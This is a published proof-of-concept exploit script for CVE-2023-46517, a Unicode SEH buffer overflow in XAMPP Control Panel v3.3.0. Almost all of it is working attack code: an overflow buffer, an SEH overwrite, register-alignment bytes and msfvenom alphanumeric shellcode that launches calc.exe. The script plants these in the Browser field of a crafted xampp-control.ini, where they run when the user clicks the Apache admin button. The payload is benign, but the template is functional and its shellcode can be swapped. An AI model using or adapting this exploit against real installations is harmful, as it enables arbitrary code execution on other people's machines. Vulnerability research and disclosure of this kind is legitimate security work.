XAMPP - Buffer Overflow PoC - CVE-2023-46517

1. # Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
2. # Date: 2023-10-26
3. # Author: Talson (@Ripp3rdoc)
4. # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
5. # Version: 3.3.0
6. # Tested on: Windows 11
7. # CVE-2023-46517
8.  
9. ##########################################################
10. # _________ _______  _        _______  _______  _        #
11. # \__   __/(  ___  )( \      (  ____ \(  ___  )( (    /| #
12. #    ) (   | (   ) || (      | (    \/| (   ) ||  \  ( | #
13. #    | |   | (___) || |      | (_____ | |   | ||   \ | | #
14. #    | |   |  ___  || |      (_____  )| |   | || (\ \) | #
15. #    | |   | (   ) || |            ) || |   | || | \   | #
16. #    | |   | )   ( || (____/\/\____) || (___) || )  \  | #
17. #    )_(   |/     \|(_______/\_______)(_______)|/    )_) #
18. #                                                        #
19. ##########################################################
20.  
21. # Proof-of-Concept Steps to Reproduce :
22.  
23. # 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
24. # 2.- Open the application (xampp-control.exe)
25. # 3.- Click on the "admin" button in front of Apache service.
26. # 4.- Profit
27.  
28. # Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
29.  
30. # Greetingz to EMU TEAM (¬‿¬)⩙
31.  
32. from pwn import *
33. import shutil
34. import os.path
35.  
36. buffer      =   "\x41" * 268        # 268 bytes to fill the buffer
37. nseh        =   "\x59\x71"          # next SEH address  — 0x00590071 (a harmless padding)
38. seh         =   "\x15\x43"          # SEH handler       — 0x00430015: pop ecx ; pop ebp ; ret ;
39. padd        =   "\x71" * 0x55       # padding
40.  
41. eax_align =     "\x47"          # venetian pad/align
42. eax_align +=    "\x51"          # push ecx
43. eax_align +=    "\x71"          # venetian pad/align
44. eax_align +=    "\x58"          # pop eax               -> eax = 0019e1a0
45. eax_align +=    "\x71"          # venetian pad/align
46. eax_align +=    "\x05\x24\x11"  # add eax,0x11002300
47. eax_align +=    "\x71"          # venetian pad/align
48. eax_align +=    "\x2d\x11\x11"  # sub eax,0x11001100    -> eax = 0019F3DC
49. eax_align +=    "\x71"          # venetian pad/align
50. eax_align +=    "\x50"          # push eax
51. eax_align +=    "\x71"          # pad to align the following ret
52. eax_align +=    "\xc3";         # ret into eax?
53.  
54. # msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
55. # Payload size: 512 bytes
56. shellcode = (
57.     "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
58.     "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
59.     "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
60.     "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
61.     "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
62.     "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
63.     )
64.  
65. shellcode = buffer + nseh + seh +  eax_align + padd + shellcode
66.  
67.  
68. check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")
69.  
70. if check_file:
71.    
72.     print("[!] Backup file found. Generating the POC file...")
73.     pass
74. else:  
75.     # create backup
76.     try:
77.         shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
78.         print("[+] Creating backup for xampp-control.ini...")
79.         print("[+] Backup file created!")
80.     except Exception as e:
81.         print("[!] Failed creating a backup for xampp-control.ini: ", e)
82.  
83. try:
84.    
85.     # Create the new file
86.     with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
87.         file.write(f"""[Common]
88.    Edition=
89.    Editor=
90.    Browser={shellcode}
91.  
92.    Debug=0
93.    Debuglevel=0
94.    Language=en
95.    TomcatVisible=1
96.    Minimized=0
97.  
98.    [LogSettings]
99.    Font=Arial
100.    FontSize=10
101.  
102.    [WindowSettings]
103.    Left=-1
104.    Top=-1
105.    Width=682
106.    Height=441
107.  
108.    [Autostart]
109.    Apache=0
110.    MySQL=0
111.    FileZilla=0
112.    Mercury=0
113.    Tomcat=0
114.  
115.    [Checks]
116.    CheckRuntimes=1
117.    CheckDefaultPorts=1
118.  
119.    [ModuleNames]
120.    Apache=Apache
121.    MySQL=MySQL
122.    Mercury=Mercury
123.    Tomcat=Tomcat
124.  
125.    [EnableModules]
126.    Apache=1
127.    MySQL=1
128.    FileZilla=1
129.    Mercury=1
130.    Tomcat=1
131.  
132.    [EnableServices]
133.    Apache=1
134.    MySQL=1
135.    FileZilla=1
136.    Tomcat=1
137.  
138.    [BinaryNames]
139.    Apache=httpd.exe
140.    MySQL=mysqld.exe
141.    FileZilla=filezillaserver.exe
142.    FileZillaAdmin=filezilla server interface.exe
143.    Mercury=mercury.exe
144.    Tomcat=tomcat8.exe
145.  
146.    [ServiceNames]
147.    Apache=Apache2.4
148.    MySQL=mysql
149.    FileZilla=FileZillaServer
150.    Tomcat=Tomcat
151.    [ServicePorts]
152.    Apache=80
153.    ApacheSSL=443
154.    MySQL=3306
155.    FileZilla=21
156.    FileZill=14147
157.    Mercury1=25
158.    Mercury2=79
159.    Mercury3=105
160.    Mercury4=106
161.    Mercury5=110
162.    Mercury6=143
163.    Mercury7=2224
164.    TomcatHTTP=8080
165.    TomcatAJP=8009
166.    Tomcat=8005
167.    [UserConfigs]
168.    Apache=
169.    MySQL=
170.    FileZilla=
171.    Mercury=
172.    Tomcat=
173.  
174.    [UserLogs]
175.    Apache=
176.    MySQL=
177.    FileZilla=
178.    Mercury=
179.    Tomcat=
180.    """)
181.     print("[+] Created the POC!")
182.  
183. except Exception as e:
184.     print("[!] Failed creating the POC xampp-control.ini: ", e)
185.